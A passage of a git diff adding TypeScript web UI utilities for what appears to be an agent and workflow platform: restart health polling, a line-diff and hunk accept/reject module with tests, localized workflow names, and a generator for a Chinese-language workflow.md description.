   ignored?: boolean;
+  metadata?: Record<string, any>;
   // Tool part
   tool?: string;
   callID?: string;
diff --git a/webui/src/utils/agentDisplay.ts b/webui/src/utils/agentDisplay.ts
index a511ff66b..075251707 100644
--- a/webui/src/utils/agentDisplay.ts
+++ b/webui/src/utils/agentDisplay.ts
@@ -30,3 +30,12 @@ export function getAgentDisplayName(
   const cn = (agent.nameCn ?? '').trim();
   return isChineseLocale(language) ? (cn || en) : en;
 }
+
+export function isAgentUsableInChat(
+  agent: { mode?: string; hidden?: boolean; delegatable?: boolean; tags?: string[] } | null | undefined,
+): boolean {
+  if (!agent) return false;
+  // Hidden and system-tagged agents are excluded; primary agents pass; the rest pass unless delegatable is false.
+  const isExcluded = Boolean(agent.hidden) || (agent.tags ?? []).includes('system');
+  return !isExcluded && (agent.mode === 'primary' || agent.delegatable !== false);
+}
diff --git a/webui/src/utils/restartPolling.ts b/webui/src/utils/restartPolling.ts
new file mode 100644
index 000000000..574098690
--- /dev/null
+++ b/webui/src/utils/restartPolling.ts
@@ -0,0 +1,57 @@
+const UPGRADE_PAGE_MARKER = 'flocks-upgrade-in-progress'; // substring looked for in the root page HTML
+
+export interface RestartReadiness {
+  ready: boolean;
+  reason?: string; // set when ready is false: the failed checks joined with "; "
+}
+
+/** Turn an unknown thrown value into a short human-readable message. */
+function errorMessage(error: unknown): string {
+  // Prefer a non-empty Error message, then a non-empty string; otherwise use a generic label.
+  const text = error instanceof Error ? error.message : typeof error === 'string' ? error : '';
+  return text || 'request failed';
+}
+
+/**
+ * Fetch the root page and describe why it does not look like the restarted app.
+ * Resolves to null when the page loads and does not contain the upgrade marker.
+ */
+async function readUpgradePageState(): Promise<string | null> {
+  try {
+    const page = await fetch('/', { cache: 'no-store' });
+    if (!page.ok) return `root page returned HTTP ${page.status}`;
+
+    const html = await page.text();
+    return html.includes(UPGRADE_PAGE_MARKER)
+      ? 'upgrade handover page is still active'
+      : null;
+  } catch (error) {
+    return `root page check failed: ${errorMessage(error)}`;
+  }
+}
+
+/**
+ * Probe the backend after a restart and report whether it is serving again.
+ *
+ * Resolves to `{ ready: true }` when `GET /api/health` answers with an OK status.
+ * Otherwise resolves to `{ ready: false, reason }`, where `reason` joins the health
+ * probe outcome with the root-page diagnosis (when there is one) using "; ".
+ */
+export async function checkRestartReadiness(): Promise<RestartReadiness> {
+  // null means the health endpoint answered OK; otherwise a description of what went wrong.
+  let healthProblem: string | null = null;
+
+  try {
+    const probe = await fetch('/api/health', { cache: 'no-store' });
+    if (!probe.ok) {
+      healthProblem = `health check returned HTTP ${probe.status}`;
+    }
+  } catch (error) {
+    healthProblem = `health check failed: ${errorMessage(error)}`;
+  }
+
+  if (healthProblem === null) return { ready: true };
+  // Only when the health probe failed is the root page fetched for extra diagnosis.
+  const pageProblem = await readUpgradePageState();
+  const reason = [healthProblem, pageProblem].filter(Boolean).join('; ');
+  return { ready: false, reason };
+}
diff --git a/webui/src/utils/textDiff.test.ts b/webui/src/utils/textDiff.test.ts
new file mode 100644
index 000000000..df3a7c49d
--- /dev/null
+++ b/webui/src/utils/textDiff.test.ts
@@ -0,0 +1,30 @@
+import { describe, expect, it } from 'vitest';
+
+import {
+  acceptTextDiffHunk,
+  buildLineDiff,
+  buildTextDiffHunks,
+  rejectTextDiffHunk,
+} from './textDiff';
+
+describe('buildLineDiff', () => {
+  it('keeps context lines and marks additions and removals in order', () => {
+    expect(buildLineDiff('a\nb\nc\n', 'a\nx\nc\nd\n')).toEqual([
+      { type: 'context', oldLine: 1, newLine: 1, text: 'a' },
+      { type: 'remove', oldLine: 2, text: 'b' },
+      { type: 'add', newLine: 2, text: 'x' },
+      { type: 'context', oldLine: 3, newLine: 3, text: 'c' },
+      { type: 'add', newLine: 4, text: 'd' },
+    ]);
+  });
+
+  it('builds hunks and can accept or reject one hunk at a time', () => {
+    const before = 'old title\n\nkeep\n\nold tail\n';
+    const after = 'new title\n\nkeep\n\nnew tail\n';
+    const hunks = buildTextDiffHunks(before, after); // two separate changes: the first line and the last line
+
+    expect(hunks).toHaveLength(2);
+    expect(acceptTextDiffHunk(before, hunks[0])).toBe('new title\n\nkeep\n\nold tail\n'); // only the title change is applied
+    expect(rejectTextDiffHunk(after, hunks[0])).toBe('old title\n\nkeep\n\nnew tail\n'); // only the title change is reverted
+  });
+});
diff --git a/webui/src/utils/textDiff.ts b/webui/src/utils/textDiff.ts
new file mode 100644
index 000000000..1e298afde
--- /dev/null
+++ b/webui/src/utils/textDiff.ts
@@ -0,0 +1,199 @@
+export type TextDiffLineType = 'context' | 'add' | 'remove';
+
+export interface TextDiffLine {
+  type: TextDiffLineType;
+  oldLine?: number; // 1-based line number in the old text; set on context and remove lines
+  newLine?: number; // 1-based line number in the new text; set on context and add lines
+  text: string;
+}
+
+export interface TextDiffHunk {
+  id: string; // `hunk-<ordinal>-<oldStartIndex>-<newStartIndex>`
+  lines: TextDiffLine[]; // display slice: the changed run plus surrounding diff lines
+  changeStartLineIndex: number; // index into the full line diff of the first changed line
+  changeEndLineIndex: number; // exclusive end index into the full line diff
+  oldStartIndex: number; // 0-based start of the replaced range in the old text's lines
+  oldEndIndex: number; // exclusive end of that range
+  newStartIndex: number; // 0-based start of the replacing range in the new text's lines
+  newEndIndex: number; // exclusive end of that range
+  oldLines: string[]; // old lines in [oldStartIndex, oldEndIndex)
+  newLines: string[]; // new lines in [newStartIndex, newEndIndex)
+  added: number; // count of 'add' lines reported for this hunk
+  removed: number; // count of 'remove' lines reported for this hunk
+}
+
+/** Split text into lines, treating CRLF and lone CR as LF and dropping one trailing empty line. */
+function splitLines(text: string): string[] {
+  const unified = text.replace(/\r\n/g, '\n').replace(/\r/g, '\n');
+  if (unified === '') return [];
+  const pieces = unified.split('\n');
+  // A final newline yields an empty last piece; it ends a line rather than starting a new one.
+  const endsWithBreak = pieces[pieces.length - 1] === '';
+  return endsWithBreak ? pieces.slice(0, -1) : pieces;
+}
+
+/** Join lines with "\n"; append a final "\n" when requested and there is at least one line. */
+function joinLines(lines: string[], keepTrailingNewline: boolean): string {
+  const terminator = keepTrailingNewline && lines.length > 0 ? '\n' : '';
+  return lines.join('\n') + terminator;
+}
+
+/**
+ * Compute a line-level diff between two texts.
+ *
+ * Both texts are split with `splitLines`; a longest-common-subsequence (LCS) table over
+ * the two line arrays then drives one forward walk that emits, in order:
+ *   - `context` for a line kept in both texts (carries `oldLine` and `newLine`),
+ *   - `remove` for a line only in `before` (carries `oldLine`),
+ *   - `add` for a line only in `after` (carries `newLine`).
+ * Line numbers are 1-based. When removing and adding are equally good, the removal
+ * is emitted first.
+ *
+ * The table has (old lines + 1) x (new lines + 1) cells, so time and memory grow with
+ * the product of the two line counts.
+ *
+ * @param before - The original text.
+ * @param after - The modified text.
+ * @returns The diff lines in display order.
+ */
+export function buildLineDiff(before: string, after: string): TextDiffLine[] {
+  const source = splitLines(before);
+  const target = splitLines(after);
+  const sourceSize = source.length;
+  const targetSize = target.length;
+
+  // table[r][c] = LCS length of source[r..] and target[c..]; the extra last row/column stay 0.
+  const table: number[][] = [];
+  for (let r = 0; r <= sourceSize; r += 1) {
+    table.push(new Array<number>(targetSize + 1).fill(0));
+  }
+
+  // Fill bottom-up so every cell only reads cells that are already final.
+  for (let r = sourceSize - 1; r >= 0; r -= 1) {
+    for (let c = targetSize - 1; c >= 0; c -= 1) {
+      table[r][c] = source[r] === target[c]
+        ? table[r + 1][c + 1] + 1
+        : Math.max(table[r + 1][c], table[r][c + 1]);
+    }
+  }
+
+  const diff: TextDiffLine[] = [];
+  let oldAt = 0;
+  let newAt = 0;
+
+  // Walk both line arrays front to back until each is fully consumed.
+  while (oldAt < sourceSize || newAt < targetSize) {
+    const bothLeft = oldAt < sourceSize && newAt < targetSize;
+
+    if (bothLeft && source[oldAt] === target[newAt]) {
+      diff.push({ type: 'context', oldLine: oldAt + 1, newLine: newAt + 1, text: source[oldAt] });
+      oldAt += 1;
+      newAt += 1;
+      continue;
+    }
+
+    // With one side exhausted, the rest of the other side is all removals or all additions;
+    // otherwise step toward the longer remaining LCS, preferring a removal on ties.
+    const takeRemoval = bothLeft ? table[oldAt + 1][newAt] >= table[oldAt][newAt + 1] : oldAt < sourceSize;
+    if (takeRemoval) {
+      diff.push({ type: 'remove', oldLine: oldAt + 1, text: source[oldAt] });
+      oldAt += 1;
+    } else {
+      diff.push({ type: 'add', newLine: newAt + 1, text: target[newAt] });
+      newAt += 1;
+    }
+  }
+
+  return diff;
+}
+
+/**
+ * Group the line diff of two texts into hunks, one per run of consecutive changed lines.
+ *
+ * Each hunk records the half-open, 0-based ranges it covers in the old and new line
+ * arrays (`oldStartIndex..oldEndIndex`, `newStartIndex..newEndIndex`) and the lines in
+ * those ranges. `lines` is the display slice: the changed run plus up to `contextLines`
+ * diff lines on either side. `added` / `removed` count the lines of the changed run only.
+ *
+ * @param before - The original text.
+ * @param after - The modified text.
+ * @param contextLines - Diff lines shown before and after each changed run (default 2).
+ * @returns The hunks in document order; empty when the texts have the same lines.
+ */
+export function buildTextDiffHunks(before: string, after: string, contextLines = 2): TextDiffHunk[] {
+  const diffLines = buildLineDiff(before, after);
+  const oldLines = splitLines(before);
+  const newLines = splitLines(after);
+  const hunks: TextDiffHunk[] = [];
+
+  // Cursors count how many old/new lines the walk below has consumed so far.
+  let oldCursor = 0;
+  let newCursor = 0;
+  let changeStartLineIndex: number | null = null;
+  let oldStartIndex = 0;
+  let newStartIndex = 0;
+
+  // Close the currently open changed run, if any. `changeEndLineIndex` is exclusive.
+  const pushHunk = (changeEndLineIndex: number) => {
+    if (changeStartLineIndex === null) return;
+    const oldEndIndex = oldCursor;
+    const newEndIndex = newCursor;
+    const displayStart = Math.max(0, changeStartLineIndex - contextLines);
+    const displayEnd = Math.min(diffLines.length, changeEndLineIndex + contextLines);
+    hunks.push({
+      id: `hunk-${hunks.length + 1}-${oldStartIndex}-${newStartIndex}`,
+      lines: diffLines.slice(displayStart, displayEnd),
+      changeStartLineIndex,
+      changeEndLineIndex,
+      oldStartIndex,
+      oldEndIndex,
+      newStartIndex,
+      newEndIndex,
+      oldLines: oldLines.slice(oldStartIndex, oldEndIndex),
+      newLines: newLines.slice(newStartIndex, newEndIndex),
+      // Count only this run's own changes. Counting over `lines` would also pick up
+      // changed lines of a neighbouring hunk that fall inside the context window.
+      added: newEndIndex - newStartIndex,
+      removed: oldEndIndex - oldStartIndex,
+    });
+    changeStartLineIndex = null;
+  };
+
+  diffLines.forEach((line, index) => {
+    if (line.type === 'context') {
+      pushHunk(index);
+      oldCursor += 1;
+      newCursor += 1;
+      return;
+    }
+    if (changeStartLineIndex === null) {
+      changeStartLineIndex = index;
+      oldStartIndex = oldCursor;
+      newStartIndex = newCursor;
+    }
+    if (line.type === 'remove') oldCursor += 1;
+    else newCursor += 1;
+  });
+  pushHunk(diffLines.length);
+  return hunks;
+}
+
+/** Apply one hunk to the old text: swap the hunk's old line range for its new lines. */
+export function acceptTextDiffHunk(before: string, hunk: TextDiffHunk): string {
+  const { oldStartIndex, oldEndIndex, newLines } = hunk;
+  const resultLines = splitLines(before);
+  const replacedCount = oldEndIndex - oldStartIndex;
+  resultLines.splice(oldStartIndex, replacedCount, ...newLines);
+  // Ask for a trailing newline only if the input text ended with one.
+  return joinLines(resultLines, before.endsWith('\n'));
+}
+
+/** Undo one hunk in the new text: swap the hunk's new line range back to its old lines. */
+export function rejectTextDiffHunk(after: string, hunk: TextDiffHunk): string {
+  const { newStartIndex, newEndIndex, oldLines } = hunk;
+  const resultLines = splitLines(after);
+  const replacedCount = newEndIndex - newStartIndex;
+  resultLines.splice(newStartIndex, replacedCount, ...oldLines);
+  // Ask for a trailing newline only if the input text ended with one.
+  return joinLines(resultLines, after.endsWith('\n'));
+}
diff --git a/webui/src/utils/workflowDisplay.test.ts b/webui/src/utils/workflowDisplay.test.ts
new file mode 100644
index 000000000..4e622949f
--- /dev/null
+++ b/webui/src/utils/workflowDisplay.test.ts
@@ -0,0 +1,67 @@
+import { describe, expect, it } from 'vitest';
+
+import type { Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from './workflowDisplay';
+
+function makeWorkflow(overrides: Partial<Workflow> = {}): Workflow { // minimal Workflow fixture for the tests below
+  return {
+    id: 'wf-1',
+    name: 'stable_workflow_name',
+    category: 'default',
+    workflowJson: {
+      start: '',
+      nodes: [],
+      edges: [],
+    },
+    status: 'draft',
+    createdAt: 0,
+    updatedAt: 0,
+    stats: {
+      callCount: 0,
+      successCount: 0,
+      errorCount: 0,
+      totalRuntime: 0,
+      avgRuntime: 0,
+      thumbsUp: 0,
+      thumbsDown: 0,
+    },
+    ...overrides, // spread last so overrides replace the defaults above (shallowly)
+  };
+}
+
+describe('getWorkflowDisplayName', () => {
+  it('uses localized workflow response names for the active language', () => {
+    const workflow = makeWorkflow({
+      nameI18n: {
+        'zh-CN': '中文工作流名称',
+        'en-US': 'English Workflow Name',
+      },
+    });
+
+    expect(getWorkflowDisplayName(workflow, 'zh-CN')).toBe('中文工作流名称');
+    expect(getWorkflowDisplayName(workflow, 'en-US')).toBe('English Workflow Name');
+  });
+
+  it('can read names from workflow metadata', () => {
+    const workflow = makeWorkflow({
+      workflowJson: {
+        start: '',
+        nodes: [],
+        edges: [],
+        metadata: {
+          nameI18n: {
+            zh: '元数据中文名',
+            en: 'Metadata English Name',
+          },
+        },
+      },
+    });
+
+    expect(getWorkflowDisplayName(workflow, 'zh-Hans')).toBe('元数据中文名'); // any zh* language resolves through the 'zh' key here
+    expect(getWorkflowDisplayName(workflow, 'en')).toBe('Metadata English Name');
+  });
+
+  it('falls back to stable name when no localized name exists', () => {
+    expect(getWorkflowDisplayName(makeWorkflow(), 'zh-CN')).toBe('stable_workflow_name');
+  });
+});
diff --git a/webui/src/utils/workflowDisplay.ts b/webui/src/utils/workflowDisplay.ts
new file mode 100644
index 000000000..49d962beb
--- /dev/null
+++ b/webui/src/utils/workflowDisplay.ts
@@ -0,0 +1,79 @@
+import type { Workflow } from '@/api/workflow';
+
+type LocalizedNameSource = Record<string, unknown> | null | undefined; // raw value that may hold a locale -> name map
+
+function isChineseLocale(language?: string): boolean {
+  // An empty or missing language is treated as non-Chinese.
+  const tag = (language ?? '').toLowerCase().replace('_', '-');
+  return tag.startsWith('zh');
+}
+
+/** Keep only entries whose trimmed key and trimmed string value are both non-empty. */
+function localizedNamesFrom(value: LocalizedNameSource): Record<string, string> {
+  const names: Record<string, string> = {};
+  if (!value || typeof value !== 'object') return names;
+
+  for (const [rawLocale, rawName] of Object.entries(value)) {
+    if (typeof rawName !== 'string') continue;
+    const locale = rawLocale.trim();
+    const name = rawName.trim();
+    if (locale !== '' && name !== '') names[locale] = name;
+  }
+  return names;
+}
+
+/**
+ * Gather every localized name found on a workflow into one locale -> name map.
+ *
+ * Reads the workflow object itself, then its `workflowJson`, then
+ * `workflowJson.metadata`; on each it merges the `nameI18n`, `names`, `localizedNames`
+ * and `displayNames` maps, so a later source overwrites an earlier one for the same
+ * locale key. Flat alias fields (`nameZh`, `nameEn`, ...) are applied last and only
+ * fill 'zh-CN' / 'en-US' when the maps left that key empty.
+ * Returns an empty map when no workflow is given.
+ */
+function collectLocalizedNames(workflow: Workflow | null | undefined): Record<string, string> {
+  if (!workflow) return {};
+  const raw = workflow as Workflow & Record<string, unknown>;
+  const workflowJson = workflow.workflowJson as unknown as Record<string, unknown> | undefined;
+  const metadata = workflow.workflowJson?.metadata as Record<string, unknown> | undefined;
+  const containers: Array<Record<string, unknown> | undefined> = [raw, workflowJson, metadata];
+  const mapFields = ['nameI18n', 'names', 'localizedNames', 'displayNames'];
+  const names: Record<string, string> = {};
+
+  for (const container of containers) {
+    for (const field of mapFields) {
+      Object.assign(names, localizedNamesFrom(container?.[field] as LocalizedNameSource));
+    }
+  }
+
+  const aliasFields: Array<[string, string[]]> = [
+    ['zh-CN', ['nameZh', 'nameCn', 'zhName', 'cnName']],
+    ['en-US', ['nameEn', 'enName']],
+  ];
+  for (const [locale, aliases] of aliasFields) {
+    // First alias holding a non-blank string wins; `??` only skips null/undefined, so an
+    // empty string on the workflow itself hides the same alias on workflowJson/metadata.
+    const match = aliases
+      .map((alias) => raw[alias] ?? workflowJson?.[alias] ?? metadata?.[alias])
+      .find((value): value is string => typeof value === 'string' && value.trim() !== '');
+    if (match !== undefined) names[locale] = names[locale] || match.trim();
+  }
+
+  return names;
+}
+
+/** Pick the Chinese or English name from the map, trying the known key spellings in order. */
+function pickLocalizedName(names: Record<string, string>, language?: string): string {
+  const candidates = isChineseLocale(language) ? ['zh-CN', 'zh_CN', 'zh', 'cn'] : ['en-US', 'en_US', 'en'];
+  const hit = candidates.find((key) => Boolean(names[key]));
+  return hit === undefined ? '' : names[hit];
+}
+
+/** Localized display name for a workflow; falls back to its trimmed `name`, then its `id`. */
+export function getWorkflowDisplayName(workflow: Workflow | null | undefined, language?: string): string {
+  if (!workflow) return '';
+  const localizedNames = collectLocalizedNames(workflow);
+  const preferred = pickLocalizedName(localizedNames, language);
+  if (preferred) return preferred;
+  return workflow.name?.trim() || workflow.id;
+}
diff --git a/webui/src/utils/workflowMarkdown.ts b/webui/src/utils/workflowMarkdown.ts
new file mode 100644
index 000000000..b635c210d
--- /dev/null
+++ b/webui/src/utils/workflowMarkdown.ts
@@ -0,0 +1,290 @@
+import type { Workflow, WorkflowEdge, WorkflowJSON, WorkflowNode, WorkflowTrigger } from '@/api/workflow';
+
+const NODE_TYPE_LABELS: Record<string, string> = { // display label per node type; callers fall back to the raw type when a key is missing
+  python: 'Python',
+  logic: '逻辑',
+  branch: '分支',
+  loop: '循环',
+  tool: '工具',
+  llm: 'LLM',
+  http_request: 'HTTP',
+  subworkflow: '子工作流',
+};
+
+function cleanText(value?: string | null): string {
+  return value ? value.replace(/\s+/g, ' ').trim() : ''; // collapse whitespace runs; null/undefined/'' give ''
+}
+
+/** Render a value for a Markdown table cell: "-" when empty, pipes escaped, newline runs as <br>. */
+function tableCell(value: unknown): string {
+  const isEmpty = value === undefined || value === null || value === '';
+  const text = isEmpty ? '-' : String(value);
+  return text.replace(/\|/g, '\\|').replace(/\n+/g, '<br>');
+}
+
+function formatList(items: string[]): string {
+  const joined = items.map((item) => cleanText(item)).filter((item) => item !== '').join('、');
+  return joined === '' ? '-' : joined; // "-" when every item is blank
+}
+
+function nodeLabel(node?: WorkflowNode): string {
+  const typeLabel = node ? NODE_TYPE_LABELS[node.type] || node.type : ''; // unknown types are shown as-is
+  return node ? `${node.id} (${typeLabel})` : '-';
+}
+
+function summarizeDescription(text?: string): string {
+  // Blank descriptions get a fixed placeholder sentence.
+  const normalized = cleanText(text);
+  return normalized === '' ? '暂无描述。' : normalized;
+}
+
+function outgoingEdges(nodeId: string, edges: WorkflowEdge[]): WorkflowEdge[] {
+  // Edges leaving nodeId, ascending by `order` (a missing order counts as 0).
+  const leaving = edges.filter(({ from }) => from === nodeId);
+  return leaving.sort((left, right) => (left.order ?? 0) - (right.order ?? 0));
+}
+
+function incomingEdges(nodeId: string, edges: WorkflowEdge[]): WorkflowEdge[] {
+  // Edges arriving at nodeId, ascending by `order` (a missing order counts as 0).
+  const arriving = edges.filter(({ to }) => to === nodeId);
+  return arriving.sort((left, right) => (left.order ?? 0) - (right.order ?? 0));
+}
+
+/** Render an edge as "from -> to", followed by its label, mapping and constants in parentheses. */
+function describeEdge(edge: WorkflowEdge): string {
+  const mappingPairs = Object.entries(edge.mapping ?? {}).map(([key, source]) => `${key} <- ${source}`);
+  const constPairs = Object.entries(edge.const ?? {}).map(([key, value]) => `${key}=${JSON.stringify(value)}`);
+  const details = [
+    edge.label ? `分支: ${edge.label}` : '',
+    mappingPairs.length > 0 ? `映射: ${mappingPairs.join(', ')}` : '',
+    constPairs.length > 0 ? `常量: ${constPairs.join(', ')}` : '',
+  ].filter((part) => part !== '');
+  return details.length > 0 ? `${edge.from} -> ${edge.to} (${details.join('; ')})` : `${edge.from} -> ${edge.to}`;
+}
+
+/**
+ * Order node ids for display: follow the first outgoing edge from the start node
+ * until a dead end, a missing node or a repeat, then append every unvisited node
+ * in declaration order.
+ */
+function buildLinearFlow(workflowJson: WorkflowJSON): string[] {
+  const knownIds = new Set(workflowJson.nodes.map((node) => node.id));
+  const ordered: string[] = [];
+  const seen = new Set<string>();
+
+  // Without an explicit start, begin at the first declared node (if there is one).
+  let cursor: string | undefined = workflowJson.start || workflowJson.nodes[0]?.id;
+  while (cursor && knownIds.has(cursor) && !seen.has(cursor)) {
+    seen.add(cursor);
+    ordered.push(cursor);
+    cursor = outgoingEdges(cursor, workflowJson.edges)[0]?.to;
+  }
+
+  const leftovers = workflowJson.nodes.filter((node) => !seen.has(node.id)).map((node) => node.id);
+  return [...ordered, ...leftovers];
+}
+
+function describeNodeInputs(node: WorkflowNode, workflowJson: WorkflowJSON): string {
+  // The start node, or any node without incoming edges, is described as fed by the workflow/trigger input.
+  const sources = incomingEdges(node.id, workflowJson.edges).map(({ from }) => from);
+  return node.id !== workflowJson.start && sources.length > 0 ? sources.join('、') : '工作流输入 / 触发器输入';
+}
+
+function describeNodeOutputs(node: WorkflowNode, workflowJson: WorkflowJSON): string {
+  // A node with no outgoing edges is described as producing the workflow's final output.
+  const targets = outgoingEdges(node.id, workflowJson.edges).map(({ to }) => to);
+  return targets.length > 0 ? targets.join('、') : '工作流最终输出';
+}
+
+/**
+ * Suggest (in Chinese) what to edit in a node, from keywords in its id/description, then its type.
+ */
+function inferEditFocus(node: WorkflowNode): string {
+  const haystack = `${node.id} ${node.description || ''}`.toLowerCase();
+  const mentions = (...keywords: string[]) => keywords.some((keyword) => haystack.includes(keyword));
+
+  // Keyword rules are checked first, in this order; the node type is only a fallback.
+  if (mentions('dedup', 'minhash', 'lsh')) return '修改去重阈值、状态保存、结果落盘路径或输出格式时，优先编辑这里。';
+  if (mentions('normalize')) return '修改统一字段、字段重命名、来源差异兼容时，优先编辑这里。';
+  if (mentions('filter')) return '修改保留/丢弃规则、方向判断、告警类型分类时，优先编辑这里。';
+  if (mentions('receive', 'incoming', 'syslog')) return '修改输入来源、日志格式识别、TDP/SkyEye 自动识别规则时，优先从这里开始。';
+  switch (node.type) {
+    case 'tool': return '修改外部工具名称、参数映射或工具返回值处理时，优先检查这里。';
+    case 'llm': return '修改提示词、模型或结构化输出要求时，优先检查这里。';
+    default: return '修改此步骤的输入、输出或执行逻辑时，先确认上下游字段是否同步变化。';
+  }
+}
+
+function summarizeTrigger(trigger: WorkflowTrigger): string {
+  const state = trigger.enabled === false ? '关闭' : '启用'; // only an explicit false counts as disabled
+  const suffix = trigger.description ? `，${trigger.description}` : '';
+  return `- ${trigger.name || trigger.id}: ${trigger.type}，${state}${suffix}`;
+}
+
+/** One bullet per saved sample input from `metadata.sampleInputs`, with long values cut at 120 chars. */
+function summarizeSampleInputs(workflowJson: WorkflowJSON): string[] {
+  const sampleInputs = workflowJson.metadata?.sampleInputs;
+  if (!sampleInputs || typeof sampleInputs !== 'object') return [];
+  return Object.entries(sampleInputs).map(([key, value]) => {
+    // JSON.stringify yields undefined for undefined/functions/symbols; String() keeps `.length` safe.
+    const preview = typeof value === 'string' ? value : JSON.stringify(value) ?? String(value);
+    return `- ${key}: ${preview.length > 120 ? `${preview.slice(0, 120)}...` : preview}`;
+  });
+}
+
+export function buildWorkflowMarkdown(workflow: Workflow): string { // renders a Chinese-language `workflow.md` description of the workflow
+  const workflowJson = workflow.workflowJson;
+  const orderedNodeIds = buildLinearFlow(workflowJson); // display order used by the flow line, the table and chapter 4
+  const nodesById = new Map(workflowJson.nodes.map((node) => [node.id, node]));
+  const startNode = nodesById.get(workflowJson.start);
+  const terminalNodes = workflowJson.nodes.filter((node) => outgoingEdges(node.id, workflowJson.edges).length === 0); // nodes with no outgoing edge
+  const triggers = workflowJson.triggers || [];
+  const sampleInputLines = summarizeSampleInputs(workflowJson);
+  const workflowDir = workflow.source === 'global' // 'global' workflows are shown under ~/.flocks, all others under the relative .flocks
+    ? `~/.flocks/plugins/workflows/${workflow.id}/`
+    : `.flocks/plugins/workflows/${workflow.id}/`;
+  const generatedAt = new Date().toLocaleString(); // current time in the runtime's locale, so the output differs between runs
+
+  const nodeTable = orderedNodeIds.map((nodeId, index) => {
+    const node = nodesById.get(nodeId);
+    if (!node) return '';
+    return `| ${index + 1} | ${tableCell(node.id)} | ${tableCell(summarizeDescription(node.description))} | ${tableCell(describeNodeOutputs(node, workflowJson))} |`;
+  }).filter(Boolean); // drop rows for ids that have no node
+
+  const nodeSections = orderedNodeIds.map((nodeId, index) => {
+    const node = nodesById.get(nodeId);
+    if (!node) return '';
+    const incoming = incomingEdges(node.id, workflowJson.edges).map(describeEdge);
+    const outgoing = outgoingEdges(node.id, workflowJson.edges).map(describeEdge);
+    return [
+      `### 4.${index + 1} ${node.id}`,
+      '',
+      `职责: ${summarizeDescription(node.description)}`,
+      '',
+      `- 节点类型: ${NODE_TYPE_LABELS[node.type] || node.type}`,
+      `- 输入来源: ${describeNodeInputs(node, workflowJson)}`,
+      `- 输出去向: ${describeNodeOutputs(node, workflowJson)}`,
+      `- 编辑重点: ${inferEditFocus(node)}`,
+      incoming.length > 0 ? `- 上游关系: ${formatList(incoming)}` : '- 上游关系: 从工作流输入开始',
+      outgoing.length > 0 ? `- 下游关系: ${formatList(outgoing)}` : '- 下游关系: 输出工作流结果',
+    ].join('\n');
+  }).filter(Boolean);
+
+  return [ // one array entry per output line; '' entries are blank lines
+    `# ${workflow.name || workflow.id}`,
+    '',
+    '这份 `workflow.md` 是工作流的人类可编辑说明。它用来解释工作流的功能、处理原理、输入输出和可修改位置；机器执行仍以 `workflow.json` 为准。',
+    '',
+    '## 1. 功能概览',
+    '',
+    `一句话说明: ${workflow.description ? summarizeDescription(workflow.description) : '这个工作流会按固定步骤处理输入，并整理出稳定、可验证的输出结果。'}`,
+    '',
+    '基本信息:',
+    '',
+    `- 工作流 ID: \`${workflow.id}\``,
+    `- 工作流目录: \`${workflowDir}\``,
+    `- 分类: \`${workflow.category || 'default'}\``,
+    `- 状态: \`${workflow.status || 'draft'}\``,
+    `- 入口节点: ${nodeLabel(startNode)}`,
+    `- 终点节点: ${formatList(terminalNodes.map(nodeLabel))}`,
+    `- 生成时间: ${generatedAt}`,
+    '',
+    '适合在这里写清楚:',
+    '',
+    '- 这个工作流解决什么问题。',
+    '- 适合处理什么输入。',
+    '- 不负责处理什么边界场景。',
+    '',
+    '## 2. 原理和总体流程',
+    '',
+    '核心原理是把输入按节点顺序逐步加工，每个节点只负责一个清晰职责。流程顺序如下:',
+    '',
+    '```text',
+    orderedNodeIds.join(' -> '),
+    '```',
+    '',
+    '流程表:',
+    '',
+    '| 顺序 | 节点 | 做什么 | 下一步 |',
+    '| --- | --- | --- | --- |',
+    ...nodeTable,
+    '',
+    '编辑流程结构时，要同时确认节点顺序、边关系、字段映射和最终输出是否仍然一致。',
+    '',
+    '## 3. 输入说明',
+    '',
+    '本章用于说明工作流接受什么输入，以及入口节点如何理解这些输入。',
+    '',
+    sampleInputLines.length > 0
+      ? '当前工作流保存了这些样例输入，可以先照着这些字段测试:'
+      : '当前工作流还没有保存样例输入。建议先补一条最小可运行输入，方便后续测试。',
+    '',
+    ...(sampleInputLines.length > 0 ? sampleInputLines : ['- 待补充。']),
+    '',
+    '修改输入时，至少同步检查:',
+    '',
+    '- 入口节点是否能读取新字段。',
+    '- 样例输入是否覆盖主要场景。',
+    '- 下游节点是否还在引用旧字段名。',
+    '- 发布方式中的参数说明是否需要更新。',
+    '',
+    '## 4. 模块逻辑',
+    '',
+    '本章按执行顺序解释每个节点。修改内部逻辑时，优先定位到对应节点，再检查它的上下游关系。',
+    '',
+    ...nodeSections.flatMap((section) => [section, '']), // a blank line after every node section
+    '## 5. 输出说明',
+    '',
+    '本章用于维护工作流最终返回什么，以及是否产生额外副作用。',
+    '',
+    '输出说明建议包含:',
+    '',
+    '- 返回给用户或调用方的核心字段。',
+    '- 给下游系统继续消费的结构化字段。',
+    '- 是否写文件、发通知、调用外部系统或更新状态。',
+    '- 没有结果、部分失败、完全失败时分别返回什么。',
+    '',
+    '如果还不确定输出格式，先用一条样例跑通，再把真实返回字段补到这里。',
+    '',
+    '## 6. 发布方式',
+    '',
+    '发布页会根据 `config.json` 模板和运行时状态决定展示哪些能力；`workflow.md` 只负责解释这些能力的用途。',
+    '',
+    triggers.length > 0 ? '当前 `workflow.json` 里配置了这些触发器:' : '当前 `workflow.json` 里还没有显式触发器。',
+    '',
+    ...(triggers.length > 0 ? triggers.map(summarizeTrigger) : ['- 可以通过发布页配置 API、Syslog、Kafka、Schedule 或 Webhook 等方式。']),
+    '',
+    '发布相关编辑原则:',
+    '',
+    '- 改展示模板: 修改 `config.json`。',
+    '- 改运行启停状态: 通过发布页或后端运行时状态处理。',
+    '- 改参数语义: 同步更新本章、输入说明和相关节点。',
+    '- 不要把明文密钥、长期 token 或私人路径写进 `workflow.md` 或 `config.json`。',
+    '',
+    '## 7. 编辑指南',
+    '',
+    '先判断你要改哪一类内容，再去找对应位置:',
+    '',
+    '| 修改目标 | 优先查看 |',
+    '| --- | --- |',
+    '| 输入格式、来源、样例 | 第 3 章和入口节点 |',
+    '| 字段映射、清洗、分类 | 第 4 章对应节点 |',
+    '| 分支、循环、节点增删 | `workflow.json` 和第 2 章流程表 |',
+    '| 输出字段、落盘、通知 | 第 5 章和终点节点 |',
+    '| API、Syslog、Kafka 等发布方式 | `config.json` 和第 6 章 |',
+    '| 字段重命名 | 所有上下游节点、样例输入和输出说明 |',
+    '',
+    '编辑后建议把改动说明写回相应章节，让下一个人可以直接看懂为什么这样改。',
+    '',
+    '## 8. 验证方式',
+    '',
+    '最小验收清单:',
+    '',
